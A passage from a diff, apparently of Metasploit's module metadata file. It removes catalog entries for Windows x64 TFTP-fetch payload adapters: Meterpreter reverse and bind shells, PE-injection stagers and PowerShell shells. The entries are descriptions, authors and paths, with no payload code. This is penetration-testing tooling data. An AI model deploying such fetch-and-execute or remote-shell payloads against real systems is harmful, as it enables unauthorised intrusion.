Requires Windows XP SP2 or newer.", - "references": [ - "URL-https://github.com/stephenfewer/ReflectiveDLLInjection", - "URL-https://github.com/rapid7/ReflectiveDLLInjection" - ], - "platform": "Windows", - "arch": "cmd", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2024-01-03 14:46:15 +0000", - "path": "/modules/payloads/adapters/cmd/windows/tftp/x64.rb", - "is_install_path": true, - "ref_name": "cmd/windows/tftp/x64/meterpreter_bind_tcp", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 8, - "adapter_refname": "cmd/windows/tftp/x64", - "adapted_refname": "windows/x64/meterpreter_bind_tcp", - "staged": false - }, - "payload_cmd/windows/tftp/x64/meterpreter_reverse_http": { - "name": "TFTP Fetch, Windows Meterpreter Shell, Reverse HTTP Inline (x64)", - "fullname": "payload/cmd/windows/tftp/x64/meterpreter_reverse_http", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Brendan Watters", - "OJ Reeves", - "sf " - ], - "description": "Fetch and execute an x64 payload from a TFTP server.\nConnect back to attacker and spawn a Meterpreter shell. 
Requires Windows XP SP2 or newer.", - "references": [ - "URL-https://github.com/stephenfewer/ReflectiveDLLInjection", - "URL-https://github.com/rapid7/ReflectiveDLLInjection" - ], - "platform": "Windows", - "arch": "cmd", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2024-01-03 14:46:15 +0000", - "path": "/modules/payloads/adapters/cmd/windows/tftp/x64.rb", - "is_install_path": true, - "ref_name": "cmd/windows/tftp/x64/meterpreter_reverse_http", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 8, - "adapter_refname": "cmd/windows/tftp/x64", - "adapted_refname": "windows/x64/meterpreter_reverse_http", - "staged": false - }, - "payload_cmd/windows/tftp/x64/meterpreter_reverse_https": { - "name": "TFTP Fetch, Windows Meterpreter Shell, Reverse HTTPS Inline (x64)", - "fullname": "payload/cmd/windows/tftp/x64/meterpreter_reverse_https", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Brendan Watters", - "OJ Reeves", - "sf " - ], - "description": "Fetch and execute an x64 payload from a TFTP server.\nConnect back to attacker and spawn a Meterpreter shell. 
Requires Windows XP SP2 or newer.", - "references": [ - "URL-https://github.com/stephenfewer/ReflectiveDLLInjection", - "URL-https://github.com/rapid7/ReflectiveDLLInjection" - ], - "platform": "Windows", - "arch": "cmd", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2024-01-03 14:46:15 +0000", - "path": "/modules/payloads/adapters/cmd/windows/tftp/x64.rb", - "is_install_path": true, - "ref_name": "cmd/windows/tftp/x64/meterpreter_reverse_https", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 8, - "adapter_refname": "cmd/windows/tftp/x64", - "adapted_refname": "windows/x64/meterpreter_reverse_https", - "staged": false - }, - "payload_cmd/windows/tftp/x64/meterpreter_reverse_ipv6_tcp": { - "name": "TFTP Fetch, Windows Meterpreter Shell, Reverse TCP Inline (IPv6) (x64)", - "fullname": "payload/cmd/windows/tftp/x64/meterpreter_reverse_ipv6_tcp", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Brendan Watters", - "OJ Reeves", - "sf " - ], - "description": "Fetch and execute an x64 payload from a TFTP server.\nConnect back to attacker and spawn a Meterpreter shell. 
Requires Windows XP SP2 or newer.", - "references": [ - "URL-https://github.com/stephenfewer/ReflectiveDLLInjection", - "URL-https://github.com/rapid7/ReflectiveDLLInjection" - ], - "platform": "Windows", - "arch": "cmd", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2024-01-03 14:46:15 +0000", - "path": "/modules/payloads/adapters/cmd/windows/tftp/x64.rb", - "is_install_path": true, - "ref_name": "cmd/windows/tftp/x64/meterpreter_reverse_ipv6_tcp", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 8, - "adapter_refname": "cmd/windows/tftp/x64", - "adapted_refname": "windows/x64/meterpreter_reverse_ipv6_tcp", - "staged": false - }, - "payload_cmd/windows/tftp/x64/meterpreter_reverse_tcp": { - "name": "TFTP Fetch, Windows Meterpreter Shell, Reverse TCP Inline x64", - "fullname": "payload/cmd/windows/tftp/x64/meterpreter_reverse_tcp", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Brendan Watters", - "OJ Reeves", - "sf " - ], - "description": "Fetch and execute an x64 payload from a TFTP server.\nConnect back to attacker and spawn a Meterpreter shell. 
Requires Windows XP SP2 or newer.", - "references": [ - "URL-https://github.com/stephenfewer/ReflectiveDLLInjection", - "URL-https://github.com/rapid7/ReflectiveDLLInjection" - ], - "platform": "Windows", - "arch": "cmd", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2024-01-03 14:46:15 +0000", - "path": "/modules/payloads/adapters/cmd/windows/tftp/x64.rb", - "is_install_path": true, - "ref_name": "cmd/windows/tftp/x64/meterpreter_reverse_tcp", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 8, - "adapter_refname": "cmd/windows/tftp/x64", - "adapted_refname": "windows/x64/meterpreter_reverse_tcp", - "staged": false - }, - "payload_cmd/windows/tftp/x64/peinject/bind_ipv6_tcp": { - "name": "TFTP Fetch, Windows x64 IPv6 Bind TCP Stager", - "fullname": "payload/cmd/windows/tftp/x64/peinject/bind_ipv6_tcp", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Brendan Watters", - "ege ", - "sf " - ], - "description": "Fetch and execute an x64 payload from a TFTP server.\nListen for an IPv6 connection (Windows x64)", - "references": [ - "URL-https://github.com/EgeBalci/Amber" - ], - "platform": "Windows", - "arch": "cmd", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2024-01-03 14:46:15 +0000", - "path": "/modules/payloads/adapters/cmd/windows/tftp/x64.rb", - "is_install_path": true, - "ref_name": "cmd/windows/tftp/x64/peinject/bind_ipv6_tcp", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 8, - "adapter_refname": "cmd/windows/tftp/x64", - "adapted_refname": "windows/x64/peinject/bind_ipv6_tcp", - "staged": true, - "stage_refname": "windows/x64/peinject", - "stager_refname": 
"windows/x64/bind_ipv6_tcp" - }, - "payload_cmd/windows/tftp/x64/peinject/bind_ipv6_tcp_uuid": { - "name": "TFTP Fetch, Windows x64 IPv6 Bind TCP Stager with UUID Support", - "fullname": "payload/cmd/windows/tftp/x64/peinject/bind_ipv6_tcp_uuid", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Brendan Watters", - "ege ", - "sf ", - "OJ Reeves" - ], - "description": "Fetch and execute an x64 payload from a TFTP server.\nListen for an IPv6 connection with UUID Support (Windows x64)", - "references": [ - "URL-https://github.com/EgeBalci/Amber" - ], - "platform": "Windows", - "arch": "cmd", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2024-01-03 14:46:15 +0000", - "path": "/modules/payloads/adapters/cmd/windows/tftp/x64.rb", - "is_install_path": true, - "ref_name": "cmd/windows/tftp/x64/peinject/bind_ipv6_tcp_uuid", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 8, - "adapter_refname": "cmd/windows/tftp/x64", - "adapted_refname": "windows/x64/peinject/bind_ipv6_tcp_uuid", - "staged": true, - "stage_refname": "windows/x64/peinject", - "stager_refname": "windows/x64/bind_ipv6_tcp_uuid" - }, - "payload_cmd/windows/tftp/x64/peinject/bind_named_pipe": { - "name": "TFTP Fetch, Windows x64 Bind Named Pipe Stager", - "fullname": "payload/cmd/windows/tftp/x64/peinject/bind_named_pipe", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Brendan Watters", - "ege ", - "UserExistsError" - ], - "description": "Fetch and execute an x64 payload from a TFTP server.\nListen for a pipe connection (Windows x64)", - "references": [ - "URL-https://github.com/EgeBalci/Amber" - ], - "platform": "Windows", - "arch": "cmd", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": 
"2024-01-03 14:46:15 +0000", - "path": "/modules/payloads/adapters/cmd/windows/tftp/x64.rb", - "is_install_path": true, - "ref_name": "cmd/windows/tftp/x64/peinject/bind_named_pipe", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 8, - "adapter_refname": "cmd/windows/tftp/x64", - "adapted_refname": "windows/x64/peinject/bind_named_pipe", - "staged": true, - "stage_refname": "windows/x64/peinject", - "stager_refname": "windows/x64/bind_named_pipe" - }, - "payload_cmd/windows/tftp/x64/peinject/bind_tcp": { - "name": "TFTP Fetch, Windows x64 Bind TCP Stager", - "fullname": "payload/cmd/windows/tftp/x64/peinject/bind_tcp", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Brendan Watters", - "ege ", - "sf " - ], - "description": "Fetch and execute an x64 payload from a TFTP server.\nListen for a connection (Windows x64)", - "references": [ - "URL-https://github.com/EgeBalci/Amber" - ], - "platform": "Windows", - "arch": "cmd", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2024-01-03 14:46:15 +0000", - "path": "/modules/payloads/adapters/cmd/windows/tftp/x64.rb", - "is_install_path": true, - "ref_name": "cmd/windows/tftp/x64/peinject/bind_tcp", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 8, - "adapter_refname": "cmd/windows/tftp/x64", - "adapted_refname": "windows/x64/peinject/bind_tcp", - "staged": true, - "stage_refname": "windows/x64/peinject", - "stager_refname": "windows/x64/bind_tcp" - }, - "payload_cmd/windows/tftp/x64/peinject/bind_tcp_rc4": { - "name": "TFTP Fetch, Bind TCP Stager (RC4 Stage Encryption, Metasm)", - "fullname": "payload/cmd/windows/tftp/x64/peinject/bind_tcp_rc4", - "aliases": [], - "rank": 300, - "disclosure_date": 
null, - "type": "payload", - "author": [ - "Brendan Watters", - "ege ", - "hdm ", - "skape ", - "sf ", - "mihi", - "max3raza", - "RageLtMan" - ], - "description": "Fetch and execute an x64 payload from a TFTP server.\nConnect back to the attacker", - "references": [ - "URL-https://github.com/EgeBalci/Amber" - ], - "platform": "Windows", - "arch": "cmd", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2024-01-03 14:46:15 +0000", - "path": "/modules/payloads/adapters/cmd/windows/tftp/x64.rb", - "is_install_path": true, - "ref_name": "cmd/windows/tftp/x64/peinject/bind_tcp_rc4", - "check": false, - "post_auth": true, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 8, - "adapter_refname": "cmd/windows/tftp/x64", - "adapted_refname": "windows/x64/peinject/bind_tcp_rc4", - "staged": true, - "stage_refname": "windows/x64/peinject", - "stager_refname": "windows/x64/bind_tcp_rc4" - }, - "payload_cmd/windows/tftp/x64/peinject/bind_tcp_uuid": { - "name": "TFTP Fetch, Bind TCP Stager with UUID Support (Windows x64)", - "fullname": "payload/cmd/windows/tftp/x64/peinject/bind_tcp_uuid", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Brendan Watters", - "ege ", - "sf ", - "OJ Reeves" - ], - "description": "Fetch and execute an x64 payload from a TFTP server.\nListen for a connection with UUID Support (Windows x64)", - "references": [ - "URL-https://github.com/EgeBalci/Amber" - ], - "platform": "Windows", - "arch": "cmd", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2024-01-03 14:46:15 +0000", - "path": "/modules/payloads/adapters/cmd/windows/tftp/x64.rb", - "is_install_path": true, - "ref_name": "cmd/windows/tftp/x64/peinject/bind_tcp_uuid", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - 
"session_types": false, - "needs_cleanup": false, - "payload_type": 8, - "adapter_refname": "cmd/windows/tftp/x64", - "adapted_refname": "windows/x64/peinject/bind_tcp_uuid", - "staged": true, - "stage_refname": "windows/x64/peinject", - "stager_refname": "windows/x64/bind_tcp_uuid" - }, - "payload_cmd/windows/tftp/x64/peinject/reverse_named_pipe": { - "name": "TFTP Fetch, Windows x64 Reverse Named Pipe (SMB) Stager", - "fullname": "payload/cmd/windows/tftp/x64/peinject/reverse_named_pipe", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Brendan Watters", - "ege ", - "OJ Reeves" - ], - "description": "Fetch and execute an x64 payload from a TFTP server.\nConnect back to the attacker via a named pipe pivot", - "references": [ - "URL-https://github.com/EgeBalci/Amber" - ], - "platform": "Windows", - "arch": "cmd", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2024-01-03 14:46:15 +0000", - "path": "/modules/payloads/adapters/cmd/windows/tftp/x64.rb", - "is_install_path": true, - "ref_name": "cmd/windows/tftp/x64/peinject/reverse_named_pipe", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 8, - "adapter_refname": "cmd/windows/tftp/x64", - "adapted_refname": "windows/x64/peinject/reverse_named_pipe", - "staged": true, - "stage_refname": "windows/x64/peinject", - "stager_refname": "windows/x64/reverse_named_pipe" - }, - "payload_cmd/windows/tftp/x64/peinject/reverse_tcp": { - "name": "TFTP Fetch, Windows x64 Reverse TCP Stager", - "fullname": "payload/cmd/windows/tftp/x64/peinject/reverse_tcp", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Brendan Watters", - "ege ", - "sf " - ], - "description": "Fetch and execute an x64 payload from a TFTP server.\nConnect back to the attacker (Windows x64)", - 
"references": [ - "URL-https://github.com/EgeBalci/Amber" - ], - "platform": "Windows", - "arch": "cmd", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2024-01-03 14:46:15 +0000", - "path": "/modules/payloads/adapters/cmd/windows/tftp/x64.rb", - "is_install_path": true, - "ref_name": "cmd/windows/tftp/x64/peinject/reverse_tcp", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 8, - "adapter_refname": "cmd/windows/tftp/x64", - "adapted_refname": "windows/x64/peinject/reverse_tcp", - "staged": true, - "stage_refname": "windows/x64/peinject", - "stager_refname": "windows/x64/reverse_tcp" - }, - "payload_cmd/windows/tftp/x64/peinject/reverse_tcp_rc4": { - "name": "TFTP Fetch, Reverse TCP Stager (RC4 Stage Encryption, Metasm)", - "fullname": "payload/cmd/windows/tftp/x64/peinject/reverse_tcp_rc4", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Brendan Watters", - "ege ", - "hdm ", - "skape ", - "sf ", - "mihi", - "max3raza", - "RageLtMan" - ], - "description": "Fetch and execute an x64 payload from a TFTP server.\nConnect back to the attacker", - "references": [ - "URL-https://github.com/EgeBalci/Amber" - ], - "platform": "Windows", - "arch": "cmd", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2024-01-03 14:46:15 +0000", - "path": "/modules/payloads/adapters/cmd/windows/tftp/x64.rb", - "is_install_path": true, - "ref_name": "cmd/windows/tftp/x64/peinject/reverse_tcp_rc4", - "check": false, - "post_auth": true, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 8, - "adapter_refname": "cmd/windows/tftp/x64", - "adapted_refname": "windows/x64/peinject/reverse_tcp_rc4", - "staged": true, - "stage_refname": "windows/x64/peinject", 
- "stager_refname": "windows/x64/reverse_tcp_rc4" - }, - "payload_cmd/windows/tftp/x64/peinject/reverse_tcp_uuid": { - "name": "TFTP Fetch, Reverse TCP Stager with UUID Support (Windows x64)", - "fullname": "payload/cmd/windows/tftp/x64/peinject/reverse_tcp_uuid", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Brendan Watters", - "ege ", - "sf ", - "OJ Reeves" - ], - "description": "Fetch and execute an x64 payload from a TFTP server.\nConnect back to the attacker with UUID Support (Windows x64)", - "references": [ - "URL-https://github.com/EgeBalci/Amber" - ], - "platform": "Windows", - "arch": "cmd", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2024-01-03 14:46:15 +0000", - "path": "/modules/payloads/adapters/cmd/windows/tftp/x64.rb", - "is_install_path": true, - "ref_name": "cmd/windows/tftp/x64/peinject/reverse_tcp_uuid", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 8, - "adapter_refname": "cmd/windows/tftp/x64", - "adapted_refname": "windows/x64/peinject/reverse_tcp_uuid", - "staged": true, - "stage_refname": "windows/x64/peinject", - "stager_refname": "windows/x64/reverse_tcp_uuid" - }, - "payload_cmd/windows/tftp/x64/pingback_reverse_tcp": { - "name": "TFTP Fetch, Windows x64 Pingback, Reverse TCP Inline", - "fullname": "payload/cmd/windows/tftp/x64/pingback_reverse_tcp", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Brendan Watters", - "bwatters-r7" - ], - "description": "Fetch and execute an x64 payload from a TFTP server.\nConnect back to attacker and report UUID (Windows x64)", - "references": [], - "platform": "Windows", - "arch": "cmd", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2024-01-03 14:46:15 +0000", - 
"path": "/modules/payloads/adapters/cmd/windows/tftp/x64.rb", - "is_install_path": true, - "ref_name": "cmd/windows/tftp/x64/pingback_reverse_tcp", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 8, - "adapter_refname": "cmd/windows/tftp/x64", - "adapted_refname": "windows/x64/pingback_reverse_tcp", - "staged": false - }, - "payload_cmd/windows/tftp/x64/powershell_bind_tcp": { - "name": "TFTP Fetch", - "fullname": "payload/cmd/windows/tftp/x64/powershell_bind_tcp", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Brendan Watters", - "Ben Turner", - "Dave Hardy", - "sf " - ], - "description": "Fetch and execute an x64 payload from a TFTP server.", - "references": [ - "URL-https://blog.nettitude.com/uk/interactive-powershell-session-via-metasploit" - ], - "platform": "Windows", - "arch": "cmd", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2024-01-03 14:46:15 +0000", - "path": "/modules/payloads/adapters/cmd/windows/tftp/x64.rb", - "is_install_path": true, - "ref_name": "cmd/windows/tftp/x64/powershell_bind_tcp", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 8, - "adapter_refname": "cmd/windows/tftp/x64", - "adapted_refname": "windows/x64/powershell_bind_tcp", - "staged": false - }, - "payload_cmd/windows/tftp/x64/powershell_reverse_tcp": { - "name": "TFTP Fetch", - "fullname": "payload/cmd/windows/tftp/x64/powershell_reverse_tcp", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Brendan Watters", - "Ben Turner", - "Dave Hardy", - "sf " - ], - "description": "Fetch and execute an x64 payload from a TFTP server.", - "references": [ - 
"URL-https://blog.nettitude.com/uk/interactive-powershell-session-via-metasploit" - ], - "platform": "Windows", - "arch": "cmd", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2024-01-03 14:46:15 +0000", - "path": "/modules/payloads/adapters/cmd/windows/tftp/x64.rb", - "is_install_path": true, - "ref_name": "cmd/windows/tftp/x64/powershell_reverse_tcp", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 8, - "adapter_refname": "cmd/windows/tftp/x64", - "adapted_refname": "windows/x64/powershell_reverse_tcp", - "staged": false - }, - "payload_cmd/windows/tftp/x64/powershell_reverse_tcp_ssl": { - "name": "TFTP Fetch", - "fullname": "payload/cmd/windows/tftp/x64/powershell_reverse_tcp_ssl", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Brendan Watters", - "Ben Turner", - "Dave Hardy", - "sf " - ], - "description": "Fetch and execute an x64 payload from a TFTP server.", - "references": [ - "URL-https://blog.nettitude.com/uk/interactive-powershell-session-via-metasploit" - ], - "platform": "Windows", - "arch": "cmd", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2024-01-03 14:46:15 +0000", - "path": "/modules/payloads/adapters/cmd/windows/tftp/x64.rb", - "is_install_path": true, - "ref_name": "cmd/windows/tftp/x64/powershell_reverse_tcp_ssl", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 8, - "adapter_refname": "cmd/windows/tftp/x64", - "adapted_refname": "windows/x64/powershell_reverse_tcp_ssl", - "staged": false - }, - "payload_cmd/windows/tftp/x64/shell/bind_ipv6_tcp": { - "name": "TFTP Fetch, Windows x64 Command Shell, Windows x64 IPv6 Bind TCP Stager", - "fullname": 
"payload/cmd/windows/tftp/x64/shell/bind_ipv6_tcp", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Brendan Watters", - "sf " - ], - "description": "Fetch and execute an x64 payload from a TFTP server.\nSpawn a piped command shell (Windows x64) (staged).\n\nListen for an IPv6 connection (Windows x64)", - "references": [], - "platform": "Windows", - "arch": "cmd", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2024-01-03 14:46:15 +0000", - "path": "/modules/payloads/adapters/cmd/windows/tftp/x64.rb", - "is_install_path": true, - "ref_name": "cmd/windows/tftp/x64/shell/bind_ipv6_tcp", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 8, - "adapter_refname": "cmd/windows/tftp/x64", - "adapted_refname": "windows/x64/shell/bind_ipv6_tcp", - "staged": true, - "stage_refname": "windows/x64/shell", - "stager_refname": "windows/x64/bind_ipv6_tcp" - }, - "payload_cmd/windows/tftp/x64/shell/bind_ipv6_tcp_uuid": { - "name": "TFTP Fetch, Windows x64 Command Shell, Windows x64 IPv6 Bind TCP Stager with UUID Support", - "fullname": "payload/cmd/windows/tftp/x64/shell/bind_ipv6_tcp_uuid", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Brendan Watters", - "sf ", - "OJ Reeves" - ], - "description": "Fetch and execute an x64 payload from a TFTP server.\nSpawn a piped command shell (Windows x64) (staged).\n\nListen for an IPv6 connection with UUID Support (Windows x64)", - "references": [], - "platform": "Windows", - "arch": "cmd", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2024-01-03 14:46:15 +0000", - "path": "/modules/payloads/adapters/cmd/windows/tftp/x64.rb", - "is_install_path": true, - "ref_name": "cmd/windows/tftp/x64/shell/bind_ipv6_tcp_uuid", - 
"check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 8, - "adapter_refname": "cmd/windows/tftp/x64", - "adapted_refname": "windows/x64/shell/bind_ipv6_tcp_uuid", - "staged": true, - "stage_refname": "windows/x64/shell", - "stager_refname": "windows/x64/bind_ipv6_tcp_uuid" - }, - "payload_cmd/windows/tftp/x64/shell/bind_named_pipe": { - "name": "TFTP Fetch, Windows x64 Command Shell, Windows x64 Bind Named Pipe Stager", - "fullname": "payload/cmd/windows/tftp/x64/shell/bind_named_pipe", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Brendan Watters", - "sf ", - "UserExistsError" - ], - "description": "Fetch and execute an x64 payload from a TFTP server.\nSpawn a piped command shell (Windows x64) (staged).\n\nListen for a pipe connection (Windows x64)", - "references": [], - "platform": "Windows", - "arch": "cmd", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2024-01-03 14:46:15 +0000", - "path": "/modules/payloads/adapters/cmd/windows/tftp/x64.rb", - "is_install_path": true, - "ref_name": "cmd/windows/tftp/x64/shell/bind_named_pipe", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 8, - "adapter_refname": "cmd/windows/tftp/x64", - "adapted_refname": "windows/x64/shell/bind_named_pipe", - "staged": true, - "stage_refname": "windows/x64/shell", - "stager_refname": "windows/x64/bind_named_pipe" - }, - "payload_cmd/windows/tftp/x64/shell/bind_tcp": { - "name": "TFTP Fetch, Windows x64 Command Shell, Windows x64 Bind TCP Stager", - "fullname": "payload/cmd/windows/tftp/x64/shell/bind_tcp", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Brendan Watters", - "sf " - ], - "description": "Fetch and execute an 
x64 payload from a TFTP server.\nSpawn a piped command shell (Windows x64) (staged).\n\nListen for a connection (Windows x64)", - "references": [], - "platform": "Windows", - "arch": "cmd", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2024-01-03 14:46:15 +0000", - "path": "/modules/payloads/adapters/cmd/windows/tftp/x64.rb", - "is_install_path": true, - "ref_name": "cmd/windows/tftp/x64/shell/bind_tcp", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 8, - "adapter_refname": "cmd/windows/tftp/x64", - "adapted_refname": "windows/x64/shell/bind_tcp", - "staged": true, - "stage_refname": "windows/x64/shell", - "stager_refname": "windows/x64/bind_tcp" - }, - "payload_cmd/windows/tftp/x64/shell/bind_tcp_rc4": { - "name": "TFTP Fetch, Windows x64 Command Shell, Bind TCP Stager (RC4 Stage Encryption, Metasm)", - "fullname": "payload/cmd/windows/tftp/x64/shell/bind_tcp_rc4", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Brendan Watters", - "sf ", - "hdm ", - "skape ", - "mihi", - "max3raza", - "RageLtMan" - ], - "description": "Fetch and execute an x64 payload from a TFTP server.\nSpawn a piped command shell (Windows x64) (staged).\n\nConnect back to the attacker", - "references": [], - "platform": "Windows", - "arch": "cmd", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2024-01-03 14:46:15 +0000", - "path": "/modules/payloads/adapters/cmd/windows/tftp/x64.rb", - "is_install_path": true, - "ref_name": "cmd/windows/tftp/x64/shell/bind_tcp_rc4", - "check": false, - "post_auth": true, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 8, - "adapter_refname": "cmd/windows/tftp/x64", - "adapted_refname": 
"windows/x64/shell/bind_tcp_rc4", - "staged": true, - "stage_refname": "windows/x64/shell", - "stager_refname": "windows/x64/bind_tcp_rc4" - }, - "payload_cmd/windows/tftp/x64/shell/bind_tcp_uuid": { - "name": "TFTP Fetch, Windows x64 Command Shell, Bind TCP Stager with UUID Support (Windows x64)", - "fullname": "payload/cmd/windows/tftp/x64/shell/bind_tcp_uuid", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Brendan Watters", - "sf ", - "OJ Reeves" - ], - "description": "Fetch and execute an x64 payload from a TFTP server.\nSpawn a piped command shell (Windows x64) (staged).\n\nListen for a connection with UUID Support (Windows x64)", - "references": [], - "platform": "Windows", - "arch": "cmd", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2024-01-03 14:46:15 +0000", - "path": "/modules/payloads/adapters/cmd/windows/tftp/x64.rb", - "is_install_path": true, - "ref_name": "cmd/windows/tftp/x64/shell/bind_tcp_uuid", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 8, - "adapter_refname": "cmd/windows/tftp/x64", - "adapted_refname": "windows/x64/shell/bind_tcp_uuid", - "staged": true, - "stage_refname": "windows/x64/shell", - "stager_refname": "windows/x64/bind_tcp_uuid" - }, - "payload_cmd/windows/tftp/x64/shell/reverse_tcp": { - "name": "TFTP Fetch, Windows x64 Command Shell, Windows x64 Reverse TCP Stager", - "fullname": "payload/cmd/windows/tftp/x64/shell/reverse_tcp", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Brendan Watters", - "sf " - ], - "description": "Fetch and execute an x64 payload from a TFTP server.\nSpawn a piped command shell (Windows x64) (staged).\n\nConnect back to the attacker (Windows x64)", - "references": [], - "platform": "Windows", - "arch": "cmd", - "rport": null, - 
